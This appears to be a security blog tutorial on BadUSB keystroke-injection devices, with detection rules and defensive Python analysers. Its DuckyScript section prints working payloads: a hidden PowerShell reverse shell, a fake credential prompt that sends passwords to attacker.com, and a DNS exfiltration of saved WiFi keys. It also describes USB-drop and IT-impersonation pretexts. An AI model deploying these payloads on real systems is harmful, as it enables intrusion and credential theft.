Bad USB & Rubber Ducky: When Hardware Attacks
You find a USB drive in the parking lot. Curiosity wins. You plug it in. In 3 seconds, before you can even see what's on it, your computer has been compromised. The "flash drive" was never a storage device. It was a weapon.
Deploying BadUSB devices without explicit written authorization is a federal crime under the CFAA. These techniques are for authorized penetration testing only. USB drop attacks in public spaces are illegal regardless of intent.
The Fundamental Vulnerability
Every computer implicitly trusts USB devices. When you plug in a keyboard, the OS doesn't ask "are you sure this is a keyboard?" It just accepts it. This trust is the foundation of every USB attack.
How HID Attacks Work
USB Human Interface Device (HID) attacks exploit the fact that keyboards and mice are automatically trusted. A malicious device presents itself as a keyboard, then "types" pre-programmed commands at superhuman speed—often 1000+ characters per second.
The payload executes in the context of the logged-in user. If they're an admin, so is your payload. The entire attack—from plug-in to compromise—takes 3-15 seconds.
What the Computer Sees
- New USB keyboard connected
- User typing very fast
- Normal PowerShell/cmd execution
- Network connections (if payload calls out)
What Actually Happens
- Malicious microcontroller activates
- Pre-programmed keystrokes fire
- Opens Run dialog (Win+R)
- Executes payload in milliseconds
The Arsenal: Attack Devices
From $5 DIY builds to $200 professional tools, there's a BadUSB for every budget and use case.
Rubber Ducky
The original. Created by Hak5, the Rubber Ducky looks like an ordinary USB flash drive but contains a powerful microcontroller that emulates a keyboard.
Key Features:
- Looks like innocent flash drive
- Uses DuckyScript payload language
- Payloads stored on removable MicroSD
- Cross-platform (Windows, Mac, Linux, Android)
- Instant execution on plug-in
Limitations:
- No bidirectional communication
- Blind injection (can't see screen)
- Must be physically plugged in
O.MG Cable
The ultimate covert tool. Looks exactly like a standard USB/Lightning cable but contains a WiFi-enabled implant. Leave it on someone's desk and they'll use it to charge their phone. Now you have remote access.
Key Features:
- Indistinguishable from real cables
- WiFi-enabled for remote triggering
- Web interface for payload deployment
- Can exfiltrate keystrokes (keylogger mode)
- Self-destruct capability (wipe payload)
- Geofencing—trigger based on WiFi networks
Attack Scenario: Leave cable at target's desk. Wait until they're logged in and away from keyboard. Trigger payload remotely via phone from parking lot.
Bash Bunny
Multi-function attack platform. Can emulate keyboard, storage, ethernet adapter, and serial device, often several at once. Runs full Linux with Bash scripting.
Key Features:
- Multiple attack modes (HID, Storage, Ethernet)
- Full Debian Linux onboard
- Bash/Python payloads
- Physical switch for payload selection
- LED feedback for attack status
- Can capture credentials via fake ethernet
Killer Feature: Ethernet emulation mode can capture NTLM hashes by presenting as a network device and responding to authentication requests.
Digispark ATtiny85 (~$3)
Tiny Arduino-compatible board. Program with Arduino IDE, deploy as HID device. Cheap enough to be disposable. Limited memory but sufficient for basic payloads.
Raspberry Pi Pico (~$4)
Runs pico-ducky firmware, making it Rubber Ducky compatible. Full DuckyScript support at 1/20th the price. The go-to for budget builds.
Arduino Leonardo/Pro Micro (~$10)
Native USB HID support. More memory and processing power. Can run complex payloads and even act as a keyboard/mouse combo device.
Device Comparison
| Device | Price | Covert | Remote Trigger | Best For |
|---|---|---|---|---|
| Rubber Ducky | $80 | Medium | No | Reliable pentesting |
| O.MG Cable | $180 | Excellent | Yes (WiFi) | Long-term implant |
| Bash Bunny | $120 | Low | No | Complex multi-stage |
| Pi Pico | $4 | Low | No | Budget/disposable |
| Digispark | $3 | Medium | No | Ultra-cheap drops |
DuckyScript: The Payload Language
DuckyScript is the scripting language for Rubber Ducky and compatible devices. Simple, readable, and devastatingly effective.
Basic Commands
```
REM This is a comment
REM Wait 1 second (DELAY values are in milliseconds)
DELAY 1000
REM Type "Hello World"
STRING Hello World
REM Press Enter key
ENTER
REM Windows key + R (Run dialog)
GUI r
REM Alt + F4
ALT F4
REM Ctrl + Alt + Delete
CTRL ALT DELETE
REM Tab key
TAB
REM Escape key
ESCAPE
REM Arrow keys are available (UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW)
DOWNARROW
REM Toggle caps lock
CAPSLOCK
```
Example Payload: Reverse Shell (Windows)
```
REM Windows Reverse Shell via PowerShell
REM Opens Run dialog, launches PowerShell, connects to attacker
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
ENTER
```
Example Payload: Credential Harvester
```
REM Fake Windows Security prompt to harvest credentials
REM Creates convincing login dialog, exfiltrates via webhook
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass
ENTER
DELAY 1000
STRING $cred = $host.ui.PromptForCredential('Windows Security','Your session has expired. Please re-enter your credentials.',[Environment]::UserName,[Environment]::UserDomainName);
ENTER
STRING $user = $cred.UserName; $pass = $cred.GetNetworkCredential().Password;
ENTER
STRING Invoke-WebRequest -Uri "https://attacker.com/log?u=$user&p=$pass" -Method GET
ENTER
```
Example Payload: WiFi Password Exfiltration
```
REM Extract saved WiFi passwords and exfil via DNS
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "netsh wlan export profile key=clear folder=%TEMP% && powershell -c \"foreach($f in (gci $env:TEMP\\*.xml)){$x=[xml](gc $f);$n=$x.WLANProfile.name;$k=$x.WLANProfile.MSM.security.sharedKey.keyMaterial;nslookup $n'.'$k'.exfil.attacker.com'}\" && del %TEMP%\\*.xml"
ENTER
```
The DELAY values are critical. Too short and commands fail because the target window hasn't opened yet; too long and you waste precious seconds. Test payloads on a machine with the identical OS configuration before deployment: different hardware, keyboard languages, and security software all change the timing.
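As an added example that is not part of the original article, the following Python analyser takes a DuckyScript payload (for instance one recovered from a found drive by a security team) and tallies its DELAY values and typed characters to estimate how long the injection runs, while flagging strings seen in the payloads above. The indicator list, the 1000 characters-per-second typing rate, and both sample payloads are assumptions constructed for this example.

```python
# Constructed sample modelled on the article's safe test payload (benign)
BENIGN = """DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING If you can read this, your BadUSB works!
ENTER
"""

# Constructed sample: hidden PowerShell launch (the command itself is harmless)
SUSPICIOUS = """REM demo
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -c "Start-Process notepad"
ENTER
"""

# Assumed indicator list drawn from the payloads above; extend for your environment
INDICATORS = ("-w hidden", "-ep bypass", "net.sockets.tcpclient",
              "invoke-webrequest", "nslookup", "key=clear")

def analyze(script, chars_per_sec=1000):
    """Estimate run time and collect indicator hits for one DuckyScript payload."""
    delay_ms = typed = 0
    run_dialog = shell = False
    hits = set()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue                                   # comments send no keystrokes
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            delay_ms += int(arg)
        elif cmd in ("STRING", "STRINGLN"):
            typed += len(arg)
            low = arg.lower()
            shell |= "powershell" in low or low.startswith("cmd")
            hits.update(i for i in INDICATORS if i in low)
        elif cmd == "GUI" and arg.lower() == "r":
            run_dialog = True                          # Win+R run dialog
    # typing time at the 1000 chars/s rate the article quotes, plus all delays
    est_ms = delay_ms + typed * 1000 // chars_per_sec
    verdict = "suspicious" if shell and (hits or run_dialog) else "review"
    return {"est_ms": est_ms, "run_dialog": run_dialog, "shell": shell,
            "indicators": sorted(hits), "verdict": verdict}
```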
Attack Scenarios
Scenario 1: The Parking Lot Drop
Scatter USB drives with company logos in the parking lot, near entrances, or in common areas. Label them enticingly: "Layoff Plans 2024", "Executive Bonuses", "HR Confidential".
Success rate: Studies show 45-98% of dropped USBs get plugged in. The 2016 University of Illinois study found 48% plugged in within hours.
Detection: Physical security cameras, USB device logs, user reports.
Scenario 2: The Evil Charger
Install a modified charging station at a conference, coffee shop, or shared workspace. When targets plug in their phones "to charge," the station injects payloads.
Variant: O.MG cables left at hotel business centers, airport lounges, or "borrowed" to colleagues.
Detection: USB data blocker usage, charging-only cables, awareness training.
Scenario 3: The Tech Support Visit
During a physical penetration test, pose as IT support. "I need to run a quick diagnostic on your machine." Plug in Bash Bunny, capture hashes, exfiltrate data—all while appearing to run legitimate tools.
Detection: Escort policies, badge verification, IT ticket validation.
Scenario 4: Supply Chain Interdiction
Nation-state level: Intercept hardware shipments, implant devices, reship to target. The NSA's COTTONMOUTH program implanted USB devices during transit.
Detection: Tamper-evident packaging, trusted suppliers, hardware attestation.
Detection & Defense
Technical Controls
USB Device Control
- Whitelist approved USB device IDs
- Block USB mass storage entirely
- Require device certificates
- Disable USB ports physically (kiosk mode)
Endpoint Detection
- Monitor for rapid keystroke injection
- Alert on new HID device + immediate shell
- Flag PowerShell within seconds of USB insert
- Behavioral analysis of typing patterns
Detection Signatures
```
# Windows Event Log - New USB Device
Event ID: 6416 (Security)
"A new external device was recognized"

# PowerShell Logging - Suspicious invocation
Event ID: 4104 (PowerShell/Operational)
ScriptBlock containing: "Net.Sockets.TCPClient"

# Sysmon - Process creation after USB
Event ID: 1 (Process Create)
ParentImage: explorer.exe
Image: *powershell.exe
CommandLine: *hidden* OR *bypass* OR *-enc*

# USB device insertion followed by:
- Win+R (Run dialog) within 5 seconds
- PowerShell/cmd spawn within 10 seconds
- Network connection within 30 seconds
```
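The time-window correlation the signature list describes, as an added example that is not part of the original article: a Python rule that, per host, links a new-device event (Security 6416) to a suspicious shell launch (Sysmon 1) within 10 seconds and then to an outbound connection from that shell (Sysmon 3) within 30 seconds. The event records are constructed and simplified, and the field names are assumptions rather than the exact log schema.

```python
from datetime import datetime, timedelta

# Constructed sample records (simplified Security/Sysmon fields, not real logs)
EVENTS = [
    {"ts": "2024-05-01T09:00:00", "id": 6416, "host": "WS01",
     "device": "HID Keyboard Device"},
    {"ts": "2024-05-01T09:00:03", "id": 1, "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -ep bypass -c Start-Sleep 1"},
    {"ts": "2024-05-01T09:00:07", "id": 3, "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "203.0.113.10:4444"},
    {"ts": "2024-05-01T11:30:00", "id": 6416, "host": "WS02",
     "device": "USB Mass Storage Device"},
    {"ts": "2024-05-01T11:45:00", "id": 1, "host": "WS02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

SHELL_WINDOW = timedelta(seconds=10)   # windows from the article's signature list
NET_WINDOW = timedelta(seconds=30)
SUSPECT_ARGS = ("hidden", "bypass", "-enc")
SHELLS = ("powershell.exe", "cmd.exe")

def correlate(events):
    """Per host: new device (6416) -> suspicious shell (Sysmon 1) -> callout (Sysmon 3)."""
    state, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t, host = datetime.fromisoformat(ev["ts"]), ev["host"]
        if ev["id"] == 6416:
            state[host] = {"dev": t, "shell": None}   # any new device arms a fresh window
            continue
        s = state.get(host)
        if s is None or not ev.get("image", "").lower().endswith(SHELLS):
            continue
        if ev["id"] == 1 and t - s["dev"] <= SHELL_WINDOW and any(
                a in ev["cmdline"].lower() for a in SUSPECT_ARGS):
            s["shell"] = t
            alerts.append({"host": host, "rule": "hid_then_shell",
                           "delta_s": (t - s["dev"]).seconds})
        elif ev["id"] == 3 and s["shell"] and t - s["shell"] <= NET_WINDOW:
            alerts.append({"host": host, "rule": "hid_shell_callout",
                           "dest": ev["dest"], "delta_s": (t - s["dev"]).seconds})
    return alerts
```

The WS02 records show the intended negative case: a routine PowerShell script fifteen minutes after a storage device arrives produces no alert.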
Physical Defenses
- USB Port Blockers: Physical plastic blockers that prevent insertion
- USB Data Blockers: Charge-only adapters that block data pins
- Epoxy: Fill unused ports with epoxy (extreme but effective)
- Awareness Training: "If you find a USB, report it—don't plug it in"
- Secure Disposal: Provide bins for found USB devices
Technical controls help, but curiosity is hardwired. The most effective defense is a culture where employees know USB attacks exist and report suspicious devices rather than testing them "just to see what's on it."
MITRE ATT&CK Mapping
Lab Exercise
Build Your Own BadUSB
Materials needed:
- Raspberry Pi Pico ($4)
- USB cable
- Computer for programming
Steps:
- Download pico-ducky firmware
- Hold BOOTSEL button while connecting Pico to computer
- Copy the .uf2 firmware file to the Pico drive
- Pico reboots as a CircuitPython device
- Create payload.dd with your DuckyScript
- Test on YOUR OWN machines only
Safe test payload:
```
DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING If you can read this, your BadUSB works!
ENTER
STRING This was a test payload - no malicious activity.
ENTER
```
Only use these techniques in authorized penetration tests with written permission, CTF competitions, or your own lab environment. Deploying BadUSB devices against systems you don't own is a federal crime. "I was just testing" is not a legal defense.